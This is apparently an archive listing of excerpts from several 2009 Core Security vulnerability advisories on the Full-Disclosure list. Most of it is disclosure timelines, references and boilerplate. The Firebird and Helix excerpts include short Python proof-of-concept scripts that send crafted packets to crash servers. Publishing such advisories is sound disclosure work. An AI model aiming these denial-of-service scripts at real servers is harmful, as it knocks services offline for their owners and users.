for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security
[Full-disclosure] CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
--/ The problem exists because the guard of the first if includes the result of 'opt = next(&p, end)' as part of the check. If this returns 'NULL', the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will derrefence the null-pointer. 9. *Report Timeline* . 2009-08-20: Core Security Technologies notifies Simon Kelley of the vulnerability, including technical details of the vulnerability in an advisory draft. . 2009-08-21: Simon Kelley acknowledges the vulnerability and confirms to be working on a patch. He also informs that he is aware that most home router distributions have tftp turned off by default, and firewalled, and suggests this should be mentioned on the advisory. Simon also mentions that a NULL-pointer dereference bug has also been discovered on that code, and suggests merging both bugs in the same advisory. Monday 31/08 is accepted as a possible release date for this advisory, and help is offered in contacting package maintainers of dnsmasq for most operating systems. . 2009-08-21: Core changes the advisory draft to accommodate Simon's suggestions. About the NULL-pointer dereference, Core mentions the terms it thinks appropriate for the bug to be merged into this advisory, and details how this would affect the following procedures, such as asking for a CVE/Bugtraq ID. . 2009-08-23: Simon Kelley contacts Core back, saying that the terms for the null-pointer derrefence bug to be included in the advisory are ok. He also mentions that the finder of this bug prefers to remain uncredited in this advisory. Details are sent by him about the new bug so that the advisory draft can be updated to include it. . 2009-08-23: Core asks for proper CVE and Bugtraq ID numbers, specifying it believes each vulnerability reported in this advisory should be assigned its own. . 2009-08-23: Vincent Danen, from Red Hat's Security Response Team contacts Core in order to discuss both vulnerabilities by a secure communications channel, and offers its help in obtaining proper CVE numbers, specifying they also believe a separate number should be assigned to each vulnerability. . 2009-08-23: Core replies to Vincent Danen by sending its gpg key. Core also mentions separate CVE numbers have already been asked. . 2009-08-23: Core replies to Simon Kelley, including a new advisory draft with both bugs merged. . 2009-08-23: Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends them to Red Hat and Simon Kelley. . 2009-08-31: The advisory CORE-2009-0820 is published. 10. *References* [1] http://www.thekelleys.org.uk/dnsmasq/doc.html [2] http://www.isi.edu/in-notes/ien/ien133.txt [3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm wa3syAdyXlixVdQhdk5vcK0= =tfqM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0820: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
1; transfer->block = 0; } } - ---/ The problem exists because the guard of the first if includes the result of 'opt = next(&p, end)' as part of the check. If this returns 'NULL', the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will derrefence the null-pointer. 9. *Report Timeline* . 2009-08-20: Core Security Technologies notifies Simon Kelley of the vulnerability, including technical details of the vulnerability in an advisory draft. . 2009-08-21: Simon Kelley acknowledges the vulnerability and confirms to be working on a patch. He also informs that he is aware that most home router distributions have tftp turned off by default, and firewalled, and suggests this should be mentioned on the advisory. Simon also mentions that a NULL-pointer dereference bug has also been discovered on that code, and suggests merging both bugs in the same advisory. Monday 31/08 is accepted as a possible release date for this advisory, and help is offered in contacting package maintainers of dnsmasq for most operating systems. . 2009-08-21: Core changes the advisory draft to accommodate Simon's suggestions. About the NULL-pointer dereference, Core mentions the terms it thinks appropriate for the bug to be merged into this advisory, and details how this would affect the following procedures, such as asking for a CVE/Bugtraq ID. . 2009-08-23: Simon Kelley contacts Core back, saying that the terms for the null-pointer derrefence bug to be included in the advisory are ok. He also mentions that the finder of this bug prefers to remain uncredited in this advisory. Details are sent by him about the new bug so that the advisory draft can be updated to include it. . 2009-08-23: Core asks for proper CVE and Bugtraq ID numbers, specifying it believes each vulnerability reported in this advisory should be assigned its own. . 2009-08-23: Vincent Danen, from Red Hat's Security Response Team contacts Core in order to discuss both vulnerabilities by a secure communications channel, and offers its help in obtaining proper CVE numbers, specifying they also believe a separate number should be assigned to each vulnerability. . 2009-08-23: Core replies to Vincent Danen by sending its gpg key. Core also mentions separate CVE numbers have already been asked. . 2009-08-23: Core replies to Simon Kelley, including a new advisory draft with both bugs merged. . 2009-08-23: Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends them to Red Hat and Simon Kelley. . 2009-08-31: The advisory CORE-2009-0820 is published. 10. *References* [1] http://www.thekelleys.org.uk/dnsmasq/doc.html [2] http://www.isi.edu/in-notes/ien/ien133.txt [3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkqcRQMACgkQyNibggitWa10dACdFj5uU4P3FwXEzNLqSmfaATR9 M9AAnjRF5IQ75E5x6iQDIp5FU5CjkSXe =loI2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability
ices, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkqLIpwACgkQyNibggitWa2yqgCeJ3qxJluj3aNZzz3Y6XPULeHa KG8AnRiJXqQ/XX2E0UKb1sQOeWGfJhIc =GQCO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0707: Firebird SQL op_connect_request main listener shutdown vulnerability
t)) print "(+) Sending op_connect_request packet..." s.send(str(packet)) s.close() print "(+) op_connect_request packet successfully sent." #Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down print "(+) Waiting 10 seconds before trying to reconnect to the server..." time.sleep(10) try: print "(+) Trying to reconnect..." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.close() print "(!) Something went wrong. The server is still alive." except socket.error: print "(*) Attack successful. The server is down." port = 3050 host = '192.168.131.128'#Replace with your target host attack(host, port) - ---/ 9. *Report Timeline* . 2009-07-15: Core Security Technologies notifies the Firebird team of the vulnerability. . 2009-07-16: Firebird team requests technical details in plaintext. . 2009-07-16: Core sends the advisory draft, including technical details. . 2009-07-20: Firebird team notifies that the issue is resolved in all branches of the Firebird repository [2]. Technical details will be publicly visible when Core releases its advisory. Firebird team notices that Firebird version 1.5.5 (marked as non vulnerable in the advisory draft) seems to be affected. . 2009-07-27: Core sends the final version of the advisory to the Firebird team. . 2009-07-28: The advisory CORE-2009-0707 is published. 10. *References* [1] http://www.firebirdsql.org [2] http://tracker.firebirdsql.org/browse/CORE-2563 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel 0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z =GgTL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities
[<&MSVCR71.strchr>]
; MSVCR71.strchr
- ---/
The following code reproduces the issue:
/---
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('172.16.132.133',554))
setRequest = "SETUP / RTSP/1.0\r\n\r\n"
s.send(setRequest)
s.close()
- ---/
9. *Report Timeline*
. 2009-03-04:
Core Security Technologies notifies RealNetworks of the vulnerability.
Core initially schedules publication of its advisory to April 6th, 2009.
. 2009-03-16:
Core notifies again RealNetworks of the vulnerability.
. 2009-03-16:
RealNetworks identifies the vulnerability alert as SPAM.
. 2009-03-20:
The RealNetworks team asks Core for a technical description of the
vulnerability.
. 2009-03-23:
Technical details sent to RealNetworks team by Core. RealNetworks
acknowledges reception.
. 2009-03-30:
Core requests information about the plans of RealNetworks to fix the
vulnerabilities.
. 2009-03-30:
RealNetworks responds that fixes will be included in the next public
release - currently targeted for July 2009.
. 2009-05-04:
Core requests RealNetworks a technical analysis of the vulnerabilities,
a list of the affected versions of Helix Server, and a detailed timeline
for developing, testing and releasing fixes for these vulnerabilities.
It is only based on that information that Core can reevaluate its
advisory publication timeframe (which was originally scheduled to be
published on April 6).
. 2009-05-05:
RealNetworks responds that fixes will be available in mid-2009, most
likely in the July time frame, and that to protect its customer base
RealNetworks will not provide additional details until the release is
publicly available.
. 2009-05-05:
Core requests a more precise estimation for the release of fixes (no
reply received).
. 2009-05-29:
Core requests again RealNetworks an estimated date for the release of
fixes, and technical details about the issues. In the meantime, the
publication of advisory CORE-2009-0227 is rescheduled for July 15th (no
reply received).
. 2009-07-16:
An updated version of the advisory was sent to RealNetworks by Core.
Core requests again information about this issue.
. 2009-07-17:
Core is made aware that Real Networks has released the Security Update
071409HS [2] on July 14th, which states that version 13.0.0 of the Helix
Server and the Helix Mobile Server have been updated to ensure that the
above vulnerabilities have been resolved.
. 2009-07-17:
The advisory CORE-2009-0227 is published by Core.
10. *References*
[1] RealNetworks
http://www.realnetworks.com/
[2] RealNetworks Security Update 071409HS
http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH
UHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh
=9iPO
-END PGP SIGNATURE-
_
[Full-disclosure] CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information
CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N TPRpR0Gn0WqmF8HOeDslbA8= =zEDK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0519 - Awingsoft Awakening Winds3D Viewer remote command execution vulnerability
quirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpVCKUACgkQyNibggitWa0tLACfTRppFDPNm6DnwqzSGNflLXHO RGkAnic/M9juNT6l18s2Rgb92SJSMqia =MoU+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass
nfirms that Protocol Lockdown is a feasible workaround. Details will be included in the Security Research and Defense blog. . 2009-06-09: Final draft of the advisory sent to MSRC. . 2009-06-09: Core Security Advisory CORE-2008-0826 published. 10. *References* [1] http://www.techzoom.net/publications/insecurity-iceberg/index.en [2] http://msdn2.microsoft.com/en-us/library/ms537183.aspx. [3] http://blogs.technet.com/srd/archive/2009/06/09/cve-2009-1140-benefits-of-ie-protected-mode-additional-network-protocol-lockdown-workaround.aspx [4] http://msdn.microsoft.com/en-us/library/ms775147(VS.85).aspx [5] http://msdn.microsoft.com/en-us/library/ms775107(VS.85).aspx [6] http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx. [7] Internet Explorer 8.0 was officially released at this time leaving the 'beta stage'. http://www.microsoft.com/windows/internet-explorer/default.aspx. [8] http://www.coresecurity.com/content/internet-explorer-zone-elevation [9] Compatibility View KB968220 - http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=008753cc-2882-400c-a45d-587c870b8c0d and http://support.microsoft.com/?kbid=968220. [10] SPAD link - http://support.microsoft.com/kb/969058. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKLtOEyNibggitWa0RAvvyAKCI46nwvU9vnduhVXILQxTdjDvS5QCfeT4Z VVaWDRlQgd4vAFGQO+I4HW0= =KI4M -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0521 - DX Studio Player Firefox plug-in command injection
duct for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q PMPteYbShbRU4j4tIk93HPM= =Mx5G -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability
nated using the vendor-sec mailing list [2]. . 2009-05-12: Apple Product Security Team notifies Core they will contact vendor-sec about this issue very soon and proposes to reschedule the advisory publication date to June 2nd. The vendor also notifies the issue was addressed in Mac OS X 10.5.7 by updating CUPS to version 1.3.10. . 2009-05-13: Apple Product Security Team notifies the suggested fix would be to update to CUPS 1.3.10. . 2009-05-15: The Red Hat Security Response Team informs (via vendor-sec) CUPS 1.1.17 is the oldest version they still ship and it is affected too. This issue will probably affect even earlier CUPS versions too. . 2009-05-25: The Debian Team informs (via vendor-sec) there is a bug in the PoC provided by Core. The advisory PoC is changed according to the comments made by Debian Team. . 2009-05-28: Core notifies that the advisory is going to be released on June 2nd, and requests a confirmation from Apple Security Team and vendor-sec subscribers. . 2009-05-29: Apple Security Team, Red Hat Security Response Team and Debian Team confirm the proposed release date. There was no request for embargo date shift posted to vendor-sec. . 2009-06-02: The advisory CORE-2009-0420 is published. 10. *References* [1] http://www.cups.org. [2] Vendor-sec, a mailing list dedicated to distributors of operating systems using (but not necessarily solely comprised of) free and open-source software. http://oss-security.openwall.org/wiki/mailing-lists/vendor-sec. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKJY7HyNibggitWa0RAtcuAJ9vxQ4OjXhyOepyzgUg8WvG8rCMlACgsUTK A3cfFRppX8VCa6hzPcVEOiw= =G46K -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0401 - StoneTrip S3DPlayers remote command injection
n. . 2009-05-07: Core requests a status update for this vulnerability and notifies its plan to publish the advisory on May 18th, 2009. No reply received. . 2009-05-15: Core requests an answer to the previous mail. No reply received. . 2009-05-18: Core Advisories Team does not release the advisory as originally planned. Core re-schedules the advisory publication date to 26th May 2009. . 2009-05-20: Core notifies StoneTrip that the advisory publication date was missed and that the last status requests were not replied. Core also notifies the vendor of the final release date (26th May 2009). . 2009-05-28: After trying to contact the StoneTrip team several times without success, the advisory CORE-2009-0401 is published as 'User Release'. 10. *References* [1] http://www.stonetrip.com. [2] ShiVa, a platform for 3D real time development with focus in game development http://www.stonetrip.com/shiva/shiva-3d-game-engine.html. [3] http://www.stonetrip.com/ston3d-players/ston3d-standalone.html. [4] http://www.stonetrip.com/ston3d-players/ston3d-webplayer.html. [5] http://stdn.stonetrip.com. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKHuAiyNibggitWa0RAgJTAJsEXfUBmIjxmY7X4hplONY/Z0DOJgCfUKxJ F9s8R8PuYBiIhvLANh3XmhE= =kU8D -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0109 - Multiple XSS in Sun Communications Express
